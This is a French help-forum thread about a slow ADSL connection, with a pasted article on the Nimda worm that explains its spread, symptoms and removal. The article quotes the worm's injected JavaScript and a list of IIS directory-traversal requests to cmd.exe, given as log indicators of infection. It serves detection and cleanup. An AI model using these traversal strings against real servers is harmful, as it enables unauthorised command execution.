Connexion adsl au ralenti

Salut, pour voir a la vitesse ou tu va :
http://mire.ipadsl.net/speedtest/speedtest4.php

Dis nous quelle est ta vitesse sur base du petit test.

Ensuite passe un peu d e Ad-Aware6 :

http://telecharger.01net.com/windows/Internet/internet_utlit­aire/fiches/11643.html

Il est gratuit. Pense a faire les mises a jour avant de scaner (en haut a droite, la terre avec une loupe)

En repensant a ce que tu a dis, j'espère que tu sais qd meme télécharger ce logiciel, autrement ca va etre dur...

A bientot et bon courage, tiens nous au courant !




.: Dimi_be :.

Salut,
voila ce que donne le test
Votre Bande Passante 4.717 Kbps (0.59 Ko/sec)
donc c'est pas vraiment normal
et c pas que je ne sais pas télécharger c'est que ma connexion est tellement lent que c'est très difficile de télécharger un fichier aussi petit soit-il
enfin merci qd mm
+++

Oui avec du 1ko/ sec LoooL

La solution derai que tu trouve toi meme un truc louche sur ton pc... mais ca va etre dur.

C'est peut etre distribureur internet qui a des soucis...
Ou que tu as trop téléchagerger (c'est le cas en belgique, si on dépassse son cota, la connection est fortement ralentie)

Bon courage :


.: Dimi_be :.

salut
pour trouver moi même un truc louche sur mon ordi je ss ok mais donne moi des idées ou chercher stp
sinon c po le fournisseur car mon fournisseur est wanadoo et en plus g essayer sur un otre pc et la la connexion marche sans pb
donc le probleme reste entier

+++

Euh, en premier je regarderai dans les Processus en cours.

Essaye de voir si il n'y en a pas de louches, en essayant de les "terminer" et réessayer ta connection. Il faut etre passiante, est essayer beaucoup, meme si le pc plante a cause que tu as arreter un processus windows.

Tu pourrai aussi aller voir dans : Démarer > Executer > msconfig
Dans longelet démarage, il y a une liste de programmes qui se mettent en route lorsque Windows démare. Tu peux peut etre nous écrire la liste ici...

Bon courage !


.: Dimi_be :.

salut,
alors g suivit tes conseils et malgré que j'ai ésactiver tous les programmes au démarrage, ma connexion n'est toujours pas rétablie :'(
sinon pour les processus j'ai essayé de les désactiver un par un mais ça ne change rien à mon problème quoi que je fasse
merci pour ces tentatives
@+++

Le virus NIMDA
Aller page :  


1. Introduction :

Le virus Nimda anagramme de Admin, aussi connu sous les noms de W32/Nimda@MM, NIMDA.A, W32/Nimda.A@mm, CV-5, Minda, Concept Virus, Code Rainbow... fait depuis quelques jours des ravages chez les utilisateurs de système d'exploitation Microsoft tels Windows 2000, Windows NT, Windows 9x et Windows ME. Il utilise plusieurs modes de propagation que nous développerons par la suite :

Par E-mail
Par le partage de fichiers au niveau des réseaux locaux
Par les serveurs Web IIS
Par les backdoors laissées ouvertes par Code Red II
Comme vous pouvez le constatez, les occasions et les moyens ne manquent pas de se faire infecter. Le virus Nimda va une fois dans votre système modifier les fichiers Web de types html, htm, asp... ainsi que certains exécutables ce qui lui permettra de se répliquer sous plusieurs noms dans votre PC.

Conséquence :

Outre le fait que le virus va utiliser tous vos contacts pour se répendre par Email, il va en plus provoquer dans certains cas (dont le mien) une attaque connue sous le nom de Deny Of Service (DoS) c'est à dire qu'il va utiliser votre bande passante abusivement et ainsi provoquer une chute des performances de votre connexion en particulier haut-débit type ADSL ou câble. Je vous rassure quand même en vous disant que ce virus n'est absolument pas destructeur, il ne supprimera rien sur votre disque dur (du moins dans sa version actuelle).

2. Propagation par Email :

Le mail arrive dans votre boîte aux lettres sous forme d'un message au format MIME "multipart/alternative" découpé en deux sections distinctes. La première est définie en tant que MIME "text/html" sans texte. Par conséquent l'Email n'aura aucun contenu textuel. La deuxième section est au format MIME "audio/x-wav" et contient un fichier attaché nommé readme.exe qui est bien sûr exécutable.

Suite à une faille de sécurité décrite ici (exécution automatique des contenus MIME attachés aux Emails), tous les Emails infectés reçus avec des versions d'Outlook inférieures ou égales à la 5.5 SP1 (hormis la IE 5.01 SP2) infecteront automatiquement le système. Ainsi dans la plupart des cas vous serez infecté en ayant seulement affiché une preview ou lu cet Email sans même avoir lancé l'exécutable readme.exe. C'est pas beau la technologie :)

Selon le CERT, l'Email contenant Nimda a les caractéristiques :

Le sujet du message est variable ce qui rend son interception quasi-impossible à ce niveau là
Le fichier attaché peut lui aussi prendre différents noms mais à toujours la même taille : 57344 bytes
Le code contenu entraine un renvoi du message et donc une réinfection potentielle tous les 10 jours

3. Les serveurs Web IIS et les navigateurs Web :

Il faut savoir que le virus Nimda se propage grâce à un système très interessant et très contagieux. En fait, lorsqu'un serveur Web est infecté par le virus, ce dernier va modifier les pages Web de types asp, html, htm... Il va consulter le cache du serveur et va visiter toutes les adresses pour voir s'il ne peut pas infecter d'autres systèmes. Son déploiement va par conséquent être très rapide et très tentaculaire.

Les serveurs Web IIS sont particulièArement touchés par le virus car ce dernier utilise les failles engendrées par le virus Code Red encore très actif sur le Web. Il utilise aussi les faille d'un virus moins connu nommé sadmind/IIS worm. Il exploite aussi outre ces deux failles, divers types de vulnérabilités transversales d'IIS : IIS Directory Traversal vulnerabilities .



En utilisant le port 69 (UDP), le virus se transmet via tftp à n'importe quel autre serveur IIS vulnérable !
Lorsqu'il est implanté dans un serveur ou un PC classique, le virus Nimda se transmet à tous les répertoires du disque dur et du réseau local via les dossiers partagés. Il crée un peu partout des clônes de lui-même sous les extensions .eml et .nws (fichier reconnu par Outlook Express). Lorsqu'il rencontre des fichiers Web asp, htm, html... il insère dans chaque page ce code Javascript :

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>

Cela permet au ver d'infecter les personnes surfant sur le site dont les pages contiennent ce code. Sous réserve que leur navigateur interprète automatiquement le Javascript bien sûr... Génial non :) Voilà les actions entreprises par le ver une fois "déclenché" :

Partage du disque C: (C$)
Création d'un compte utilisateur nommé "Guest" (Windows 2000 et Windows NT uniquement)
Ajout de l'utilisateur "Guest" en tant dans le groupe des utilisateurs "Administrateurs" de la machine ("Guest" a donc tout pouvoir sur la machine)

4. Suis-je infecté ?

En général, les personnes infectées ont à la racine des disques durs c:, d: et e: un fichier admin.dll. De plus vous pouvez aussi trouver ce type de lignes dans les logs de votre serveur IIS :

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
A GET /d/winnt/system32/cmd.exe?/c+dir
br> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Le fichier system.ini est modifié de tel manière à faire apparaître cette ligne de code : Shell = explorer.exe load.exe -dontrunold.

Le fichier riched20.dll est aussi modifié par le virus de manière à ce que dès que vous exécuterez Word, le virus s'activera une nouvelle fois.

Les modifications de base de registre sont les suivantes :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]

5. Me débarrasser de la bête !

Autant vous le dire tout de suite ma méthode préférée et qui marche à tous les coups : le reformatage complet du disque système. En effet au vue de la complexité des opérations manuelles à effectuer, vous avez de larges chances de ne pas éradiquer intégralement le virus.

Si vous décidez de tenter une éradication manuelle, je vous conseille de télécharger un programme qui effectuerra toutes les opérations automatiquement. J'ai choisi personnellement celui de la sociétéA Trend Micro très connue dans le milieu professionel. Ce patch est bien sur gratuit, vous pouvez le télécharger ici dans la section For Automatic Cleaning and Removal. Cette solution suffira pour la plupart des utlisateurs. Pour les administrateurs IIS voici la marche à suivre pour vous protéger du ver :

Télécharger le Service Pack 2 de Windows 2000
Télécharger le patch Microsoft IE MIME Header Attachment Execution
Télécharger le patch Microsoft Web Server Folder Traversal vulnerability
Utiliser aussi ce patch en complément
Toujours est-il que si votre serveur est bien administré et régulièrement patché, vous ne devriez pas avoir de problèmes avec Nimda. De plus, tous les éditeurs de logiciels antivirus ont sorti une mise à jour pour détecter et supprimer ce virus.

Bonjour,
Je suis d'accord, j'ai eu le même pb (apparemment un ver, un cheval de Troy ou une prise de commande à distance). J'ai du réinstaller mon PC, que j'ai par la suite blindé de sécurité :
D'abord installer le Service Pack 2 pour Windows XP, qui détecte les saloperies de type cheval de troy, et avoir un bon anti-virus.
Enfin, installer le Firewall Zone Alarm (dispo en français), facile à paramétrer. Ce dernier indique entre autres les tentatives d'intrusion : c'est allucinant, plusieurs milliers e qques jours.

Il y a pas mal de choses à télécharger, donc une tentative de détection de virus approffondie comme indiquée par JemOzOne ou/et une réinstallation complête me semble judicieuse.
Je pense que si tu réussis à faire ça, tu seras à l'abris pour longtemps.